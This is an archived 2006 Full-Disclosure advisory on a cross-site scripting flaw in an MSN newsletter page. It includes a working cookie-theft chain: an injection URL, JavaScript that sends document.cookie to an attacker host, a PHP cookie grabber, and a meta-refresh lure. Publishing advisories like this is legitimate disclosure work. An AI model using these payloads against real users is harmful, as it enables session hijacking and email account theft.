lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <2085.68.252.204.31.1155220568.squirrel@www.morx.org>
Date: Thu, 10 Aug 2006 14:36:08 -0000 (GMT)
From: simo@...x.org
To: full-disclosure@...ts.grok.org.uk
Subject: Hotmail/MSN Cross Site Scripting Vulnerability

Hotmail/MSN Cross Site Scripting Vulnerability

Author: Simo64
Contact: simo64_at_morx_dot_org
Discovered: 07/25/2006
Published: 08/10/2006
Vendor: MSN.com
Service: Hotmail.com Webmail Service
Vulnerability: Cross Site Scripting (Cookie-Theft)
Severity: Medium/High
Tested on: IE 6.0, firefox 1.5 and Opera (should work on all
browsers)
Morx Security Research Team
http://www.morx.org


Details:

newsletter.msn.com's insite.asp script is prone to cross-site scripting
attacks. This problem is due to a failure in the application to properly
sanitize user-supplied input.

Impact:

an attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authentified
msn user in the context of the msn webpage. resulting in the theft of
cookie-based authentication giving the attacker
temporary access to the victim's email account (until the cookie expires -
about 24 hours) as well as other type of attacks.


Exploit:

http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script
src=http://attacker/redir.js>

Where redir.js code can be :

location.href='http://attacker-site/cookie-grabber.php?cookie='+escape(document.cookie)

and cookie-grabber.php can be:

<?
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$msg = "Cookie: $cookie\nIP Address: $ip";
$subject = "cookie";
mail("your@...il.org", $subject, $msg);

header ("location: http://attacker-site/some-pic.jpg");
?>

the attacker also would use an html file to redirect the victim to the xss
location

as an example of that:

<meta http-equiv="refresh" content="0;
url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script
src=http://attacker/redir.js>">

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ